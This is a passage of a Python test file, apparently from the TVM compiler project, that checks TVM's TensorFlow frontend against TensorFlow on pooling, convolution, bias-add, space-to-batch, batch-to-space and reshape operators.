return vmobj_to_list(result)
else:
with tvm.transform.PassContext(opt_level=opt_level, disabled_pass=disabled_pass):
target = tvm.target.Target(target, target_host)
graph, lib, params = relay.build(mod, target=target, params=params)
from tvm.contrib import graph_executor
m = graph_executor.create(graph, lib, dev)
# set inputs
for e, i in zip(input_node, input_data):
if e != "":
m.set_input(e, tvm.nd.array(i))
m.set_input(**params)
# execute
m.run()
# get outputs
assert out_names is None or num_output == len(
out_names
), "out_names: {} num_output: {}".format(out_names, num_output)
tvm_output_list = [m.get_output(i).asnumpy() for i in range(num_output)]
return tvm_output_list
def run_tf_graph(sess, input_data, input_node, output_node):
""" Generic function to execute tensorflow """
input_data = convert_to_list(input_data)
input_node = convert_to_list(input_node)
output_node = convert_to_list(output_node)
tensor = [sess.graph.get_tensor_by_name(output_name) for output_name in output_node]
input_dict = {e: input_data[i] for i, e in enumerate(input_node)}
if len(input_node) == 1 and input_node[0] == "":
output_data = sess.run(tensor)
else:
output_data = sess.run(tensor, input_dict)
return output_data
def compare_tf_with_tvm(
in_data,
in_name,
out_name,
init_global_variables=False,
no_gpu=False,
opt_level=3,
mode="graph_executor",
cuda_layout="NCHW",
add_shapes_to_graph_def=True,
targets=None,
ignore_in_shape=False,
):
"""Generic function to generate and compare tensorflow and TVM output"""
def name_without_num(name):
return name.split(":")[0] if ":" in name else name
out_name = convert_to_list(out_name)
out_node = [name_without_num(name) for name in out_name]
in_data = convert_to_list(in_data)
in_name = convert_to_list(in_name)
in_node = [name_without_num(name) for name in in_name]
with tf.Session() as sess:
if init_global_variables:
sess.run(variables.global_variables_initializer())
final_graph_def = (
tf_testing.AddShapesToGraphDef(sess, out_node)
if add_shapes_to_graph_def
else tf.get_default_graph().as_graph_def()
)
tf_output = run_tf_graph(sess, in_data, in_name, out_name)
devices = targets if targets else ["llvm", "cuda"]
for device in devices:
dev = tvm.device(device, 0)
if not tvm.testing.device_enabled(device):
print("Skip because %s is not enabled" % device)
continue
if no_gpu and device == "cuda":
continue
if "cublas" in device and not tvm.get_global_func("tvm.contrib.cublas.matmul", True):
print("Skip because cublas is not enabled: %s" % device)
continue
tvm_output = run_tvm_graph(
final_graph_def,
in_data,
in_node,
target=device,
out_names=out_name,
num_output=len(out_name),
opt_level=opt_level,
mode=mode,
cuda_layout=cuda_layout,
ignore_in_shape=ignore_in_shape,
)
            # since the output names from the tensorflow and relay runs are not exactly the same,
            # only the first len(tf_output) outputs are compared
for i in range(len(tf_output)):
if not isinstance(tf_output[i], np.ndarray):
assert len(tvm_output[i].shape) == 0
tvm.testing.assert_allclose(tf_output[i], tvm_output[i], atol=1e-5, rtol=1e-5)
sess.close()
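# A minimal usage sketch of compare_tf_with_tvm (illustrative only; the function
# name and tensor names below are made up for this example and mirror the
# _test_* helpers later in this file): build a one-op TensorFlow graph, then let
# the helper run it under both TensorFlow and TVM and check that the outputs
# match. The leading underscore keeps pytest from collecting it as a test.
def _example_compare_relu():
    data = np.random.uniform(size=(1, 8)).astype("float32")
    with tf.Graph().as_default():
        in_data = tf.placeholder(shape=data.shape, dtype="float32", name="in_example")
        tf.nn.relu(in_data, name="relu_example")
        compare_tf_with_tvm(data, "in_example:0", "relu_example:0")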
def is_gpu_available():
from tensorflow.python.client import device_lib
local_device_protos = device_lib.list_local_devices()
gpu_list = [x.name for x in local_device_protos if x.device_type == "GPU"]
if len(gpu_list) > 0:
print("Tensorflow GPU:", gpu_list)
return True
else:
return False
#######################################################################
# Pooling
# -------
def _test_pooling_iteration(input_shape, **kwargs):
""" One iteration of pool operation with given shapes and attributes """
x = -np.arange(np.prod(input_shape), dtype=np.float32).reshape(input_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name)
def _test_pooling(input_shape, **kwargs):
_test_pooling_iteration(input_shape, **kwargs)
if is_gpu_available():
if len(input_shape) == 4:
input_shape = [input_shape[ii] for ii in (0, 3, 1, 2)]
kwargs["data_format"] = "NCHW"
_test_pooling_iteration(input_shape, **kwargs)
def _test_pooling_dynamic(input_shape, np_shape, **kwargs):
""" Pooling with dynamic height and width dimensions. """
x = -np.arange(np.prod(np_shape), dtype=np.float32).reshape(np_shape) - 1
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=input_shape, dtype="float32")
nn_ops.pool(in_data, **kwargs)
if kwargs["pooling_type"] == "MAX":
out_name = "max_pool:0"
else:
out_name = "avg_pool:0"
compare_tf_with_tvm(x, "Placeholder:0", out_name, mode="vm", ignore_in_shape=True)
@tvm.testing.uses_gpu
def test_forward_pooling():
""" Pooling """
# TensorFlow only supports NDHWC for max_pool3d on CPU
for pool_type in ["AVG", "MAX"]:
# NDHWC is the default layout for max_pool3d and avg_pool3d in TensorFlow
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
)
_test_pooling_dynamic(
input_shape=[1, None, None, 3],
np_shape=[1, 32, 32, 3],
window_shape=[2, 2],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
# test cases for max_pool3d & avg_pool3d with layout NCDHW
# TensorFlow pool3d doesn't support NCDHW on cpu
if is_gpu_available():
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[1, 1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[1, 1, 1],
data_format="NCDHW",
)
_test_pooling(
input_shape=[1, 3, 32, 32, 32],
window_shape=[2, 2, 2],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 1, 1],
strides=[2, 2, 2],
data_format="NCDHW",
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[1, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[2, 1],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[1, 1],
)
_test_pooling(
input_shape=[2, 10, 9, 2],
window_shape=[2, 3],
padding="SAME",
pooling_type=pool_type,
dilation_rate=[1, 1],
strides=[2, 1],
)
# Tests involving SpaceToBatchND
_test_pooling(
input_shape=[1, 1, 2, 1],
window_shape=[1, 1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[1, 2],
)
_test_pooling(
input_shape=[1, 2, 1],
window_shape=[1],
padding="VALID",
pooling_type=pool_type,
dilation_rate=[2],
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_pooling(
input_shape=[2, 9, 10, 2],
window_shape=[4, 4],
padding=[[0, 0], [0, 1], [2, 3], [0, 0]],
pooling_type="MAX",
dilation_rate=[1, 1],
strides=[1, 1],
)
#######################################################################
# Convolution
# -----------
def _test_convolution(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv2d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv2D:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
elif opname == "conv_transpose":
nn_ops.conv2d_transpose(
in_data,
in_filter,
output_shape=deconv_output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"conv2d_transpose:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
else:
nn_ops.depthwise_conv2d_native(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"DepthwiseConv2dNative:0",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution():
if is_gpu_available():
_test_convolution("conv", [4, 176, 8, 8], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 19, 17, 17], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution("conv", [4, 124, 17, 17], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NCHW")
_test_convolution("conv", [4, 12, 17, 17], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NCHW")
_test_convolution(
"depthwise", [4, 176, 8, 8], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 19, 17, 17], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 124, 17, 17], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"depthwise", [4, 12, 17, 17], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NCHW"
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 176, 8, 8],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 15, 15],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NCHW",
[4, 176, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 19, 17, 17],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NCHW",
[4, 124, 17, 17],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 17, 17],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 19, 8, 8],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 19, 16, 16],
)
_test_convolution(
"conv_transpose",
[4, 32, 8, 8],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NCHW",
[4, 12, 16, 16],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 19, 8, 8],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NCHW",
[1, 1, 8, 8],
)
_test_convolution("conv", [4, 8, 8, 176], [1, 1, 176, 32], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 19], [3, 3, 19, 19], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("conv", [4, 17, 17, 124], [1, 1, 124, 19], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("conv", [4, 17, 17, 12], [3, 3, 12, 32], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"conv",
[4, 17, 17, 12],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution("depthwise", [4, 8, 8, 176], [1, 1, 176, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 19], [3, 3, 19, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 124], [1, 1, 124, 1], [1, 1], [1, 1], "SAME", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 1], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution("depthwise", [4, 17, 17, 12], [3, 3, 12, 2], [1, 1], [2, 2], "VALID", "NHWC")
_test_convolution(
"depthwise",
[4, 17, 17, 12],
[3, 3, 12, 2],
[1, 1],
[2, 2],
"VALID",
"NHWC",
add_shapes_to_graph_def=False,
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 15, 15, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
"SAME",
"NHWC",
[4, 16, 16, 176],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[3, 3, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 19],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[1, 1, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 17, 17, 19],
[3, 3, 124, 19],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 17, 17, 124],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 17, 17, 12],
)
# kernel 2x2, strides (2,2)
_test_convolution(
"conv_transpose",
[4, 8, 8, 19],
[2, 2, 19, 19],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 19],
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[2, 2, 12, 32],
[1, 1],
[2, 2],
"VALID",
"NHWC",
[4, 16, 16, 12],
)
# output channel is 1
_test_convolution(
"conv_transpose",
[1, 8, 8, 19],
[1, 1, 1, 19],
[1, 1],
[1, 1],
"VALID",
"NHWC",
[1, 8, 8, 1],
)
# Test without adding shapes to graph def
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[1, 1, 176, 32],
[1, 1],
[1, 1],
"SAME",
"NHWC",
[4, 8, 8, 176],
add_shapes_to_graph_def=False,
)
# Explicit padding
if package_version.parse(tf.VERSION) >= package_version.parse("2.4.1"):
_test_convolution(
"conv",
[4, 8, 8, 16],
[1, 1, 16, 32],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"depthwise",
[4, 8, 8, 16],
[1, 1, 16, 1],
[1, 1],
[1, 1],
[[0, 0], [2, 3], [0, 1], [0, 0]],
"NHWC",
)
_test_convolution(
"conv_transpose",
[4, 8, 8, 32],
[3, 3, 176, 32],
[1, 1],
[2, 2],
[[0, 0], [1, 0], [1, 0], [0, 0]],
"NHWC",
[4, 16, 16, 176],
)
#######################################################################
# Convolution3D
# -------------
def _test_convolution3d(
opname,
tensor_in_sizes,
filter_in_sizes,
dilations,
strides,
padding,
data_format,
deconv_output_shape=[],
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution with given shapes and attributes """
total_size_1 = np.prod(tensor_in_sizes)
total_size_2 = np.prod(filter_in_sizes)
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
filter_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_filter = constant_op.constant(filter_array, shape=filter_in_sizes, dtype="float32")
if data_format == "NDHWC":
strides = [1] + strides + [1]
dilations = [1] + dilations + [1]
else:
strides = [1, 1] + strides
dilations = [1, 1] + dilations
if opname == "conv":
nn_ops.conv3d(
in_data,
in_filter,
strides=strides,
dilations=dilations,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"),
"Placeholder:0",
"Conv3D:0",
cuda_layout="NCDHW",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d():
if is_gpu_available():
_test_convolution3d(
"conv", [4, 176, 8, 8, 8], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 19, 17, 17, 17], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 124, 17, 17, 17], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NCDHW"
)
_test_convolution3d(
"conv", [4, 12, 17, 17, 17], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NCDHW"
)
_test_convolution3d(
"conv", [4, 8, 8, 8, 176], [1, 1, 1, 176, 32], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 19], [3, 3, 3, 19, 19], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 124], [1, 1, 1, 124, 19], [1, 1, 1], [1, 1, 1], "SAME", "NDHWC"
)
_test_convolution3d(
"conv", [4, 17, 17, 17, 12], [3, 3, 3, 12, 32], [1, 1, 1], [2, 2, 2], "VALID", "NDHWC"
)
# Test without adding shapes to graph def
_test_convolution3d(
"conv",
[4, 17, 17, 17, 12],
[3, 3, 3, 12, 32],
[1, 1, 1],
[2, 2, 2],
"VALID",
"NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# Convolution3D Transpose
# -----------------------
def _test_convolution3d_transpose(
data_shape,
filter_shape,
strides,
padding,
output_shape,
data_format="NCDHW",
add_shapes_to_graph_def=True,
):
""" One iteration of 3D convolution transpose with given shapes and attributes """
dtype = "float32"
data_array = np.random.uniform(size=data_shape).astype(dtype)
filter_array = np.random.uniform(size=filter_shape).astype(dtype)
if data_format == "NDHWC":
strides = [1] + strides + [1]
else:
strides = [1, 1] + strides
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data_shape, dtype=dtype)
in_filter = constant_op.constant(filter_array, shape=filter_shape, dtype=dtype)
nn_ops.conv3d_transpose(
in_data,
in_filter,
output_shape=output_shape,
strides=strides,
padding=padding,
data_format=data_format,
)
compare_tf_with_tvm(
data_array,
"Placeholder:0",
"conv3d_transpose:0",
cuda_layout="NDHWC",
add_shapes_to_graph_def=add_shapes_to_graph_def,
)
@tvm.testing.uses_gpu
def test_forward_convolution3d_transpose():
if is_gpu_available():
_test_convolution3d_transpose(
data_shape=[1, 10, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[4, 9, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 6, 8, 8, 8],
)
_test_convolution3d_transpose(
data_shape=[1, 3, 8, 8, 8],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 6, 15, 15, 15],
)
_test_convolution3d_transpose(
data_shape=[1, 16, 8, 8, 8],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 6, 24, 24, 24],
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 10],
filter_shape=[1, 1, 1, 6, 10],
strides=[1, 1, 1],
padding="VALID",
output_shape=[1, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[4, 8, 8, 8, 9],
filter_shape=[1, 1, 1, 6, 9],
strides=[1, 1, 1],
padding="VALID",
output_shape=[4, 8, 8, 8, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 3],
filter_shape=[1, 1, 1, 6, 3],
strides=[2, 2, 2],
padding="SAME",
output_shape=[1, 15, 15, 15, 6],
data_format="NDHWC",
)
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
)
# Test without adding shapes to graph def
_test_convolution3d_transpose(
data_shape=[1, 8, 8, 8, 16],
filter_shape=[3, 3, 3, 6, 16],
strides=[3, 3, 3],
padding="VALID",
output_shape=[1, 24, 24, 24, 6],
data_format="NDHWC",
add_shapes_to_graph_def=False,
)
#######################################################################
# BiasAdd
# -----------
def _test_biasadd(tensor_in_sizes, data_format):
""" One iteration of biasadd with given shapes and attributes """
total_size_1 = 1
for s in tensor_in_sizes:
total_size_1 *= s
tensor_bias_sizes = [tensor_in_sizes[1]] if data_format == "NCHW" else [tensor_in_sizes[3]]
total_size_2 = tensor_bias_sizes[0]
# Initializes the input tensor with array containing incrementing
# numbers from 1.
data_array = [f * 1.0 for f in range(1, total_size_1 + 1)]
bias_array = [f * 1.0 for f in range(1, total_size_2 + 1)]
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=tensor_in_sizes, dtype="float32")
in_bias = constant_op.constant(bias_array, shape=tensor_bias_sizes, dtype="float32")
nn_ops.bias_add(in_data, in_bias, data_format=data_format)
compare_tf_with_tvm(
np.reshape(data_array, tensor_in_sizes).astype("float32"), "Placeholder:0", "BiasAdd:0"
)
@tvm.testing.uses_gpu
def test_forward_biasadd():
if is_gpu_available():
_test_biasadd([4, 176, 8, 8], "NCHW")
_test_biasadd([1, 100, 1, 1], "NCHW")
_test_biasadd([4, 19, 17, 17], "NCHW")
_test_biasadd([4, 124, 3, 3], "NCHW")
_test_biasadd([4, 8, 8, 176], "NHWC")
_test_biasadd([1, 1, 1, 100], "NHWC")
_test_biasadd([4, 17, 17, 19], "NHWC")
_test_biasadd([4, 3, 3, 124], "NHWC")
def _test_forward_where(input_shape):
with tf.Graph().as_default():
dtype = tf.float32
t = tf.constant(
np.random.choice([0, 1, -2, 3, -1, 0.1, -0.2], size=input_shape).astype(dtype.name)
)
out = tf.where(t)
compare_tf_with_tvm([], [], out.name, mode="debug")
compare_tf_with_tvm([], [], out.name, mode="vm")
def test_forward_argwhere():
_test_forward_where((5,))
_test_forward_where((5, 5))
_test_forward_where((5, 5, 5))
_test_forward_where((5, 5, 5, 5))
_test_forward_where((5, 5, 5, 5, 5))
#######################################################################
# SpaceToBatchND
# --------------
def _test_space_to_batch_nd(input_shape, block_shape, paddings, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def _test_space_to_batch_nd_infer_paddings(input_shape, block_shape, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
padding_np = np.array([0, 1]).astype(np.int32).reshape((1, 2))
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
const1 = tf.constant(padding_np, dtype=tf.int32)
        # compute paddings with tf.reverse so it is neither a graph input nor a constant,
        # forcing the frontend to recover its value with infer_value_simulated
paddings = tf.reverse(const1, axis=[-1])
out = tf.space_to_batch_nd(in_data, block_shape, paddings)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_space_to_batch_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/space-to-batch-n-d
_test_space_to_batch_nd(input_shape=[1, 2, 2, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 2, 2, 3], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(input_shape=[1, 4, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [0, 0]])
_test_space_to_batch_nd(
input_shape=[2, 2, 4, 1], block_shape=[2, 2], paddings=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/spacetobatch_op_test.py
_test_space_to_batch_nd(input_shape=[2, 3], block_shape=[2], paddings=[[1, 0]], dtype="float32")
_test_space_to_batch_nd(
input_shape=[2, 3, 2], block_shape=[2], paddings=[[1, 0]], dtype="float64"
)
_test_space_to_batch_nd_infer_paddings(input_shape=[2, 3, 2], block_shape=[2])
#######################################################################
# BatchToSpaceND
# --------------
def _test_batch_to_space_nd(input_shape, block_shape, crops, dtype="int32"):
data = np.random.uniform(0, 5, size=input_shape).astype(dtype)
with tf.Graph().as_default():
in_data = tf.placeholder(shape=input_shape, dtype=dtype)
out = tf.batch_to_space_nd(in_data, block_shape, crops)
compare_tf_with_tvm(data, in_data.name, out.name)
def test_forward_batch_to_space_nd():
# test cases: https://www.tensorflow.org/api_docs/cc/class/tensorflow/ops/batch-to-space-n-d
_test_batch_to_space_nd(input_shape=[4, 1, 1, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 1, 1, 3], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(input_shape=[4, 2, 2, 1], block_shape=[2, 2], crops=[[0, 0], [0, 0]])
_test_batch_to_space_nd(
input_shape=[8, 1, 3, 1], block_shape=[2, 2], crops=[[0, 0], [2, 0]], dtype="int64"
)
# pylint: disable=line-too-long
# https://github.com/tensorflow/tensorflow/blob/24f578/tensorflow/python/kernel_tests/batchtospace_op_test.py
_test_batch_to_space_nd(
input_shape=[18, 2, 1, 2], block_shape=[2, 3], crops=[[1, 1], [0, 0]], dtype="float32"
)
_test_batch_to_space_nd(
input_shape=[20, 5, 8, 7], block_shape=[2, 2], crops=[[1, 1], [1, 1]], dtype="float64"
)
#######################################################################
# Reshape
# -------
def _test_reshape(data, out_shape):
""" One iteration of reshape operation with given data and out shape """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_with_call():
""" relay.expr.Call as shape """
data = np.zeros((6, 4, 2))
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
out_shape = tf.constant([1, 2, 3], dtype="int32")
out_shape = tf.multiply(out_shape, 2)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_like(data, shape_like):
""" A special case for reshape. """
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
in_shape_like = array_ops.placeholder(shape=shape_like.shape, dtype=data.dtype)
out_shape = array_ops.shape(in_shape_like)
array_ops.reshape(in_data, out_shape)
compare_tf_with_tvm(data, "Placeholder:0", "Reshape:0")
def _test_reshape_symbolic(data, a_data, b_data):
with tf.Graph().as_default():
in_data = array_ops.placeholder(shape=data.shape, dtype=data.dtype)
a = array_ops.placeholder(shape=a_data.shape, dtype=a_data.dtype)
b = array_ops.placeholder(shape=b_data.shape, dtype=b_data.dtype)
newshape = tf.add(a, b)
out = array_ops.reshape(in_data, newshape)
for mode in ["debug", "vm"]:
compare_tf_with_tvm(
[data, a_data, b_data], [in_data.name, a.name, b.name], out.name, mode=mode
)
def test_forward_reshape():
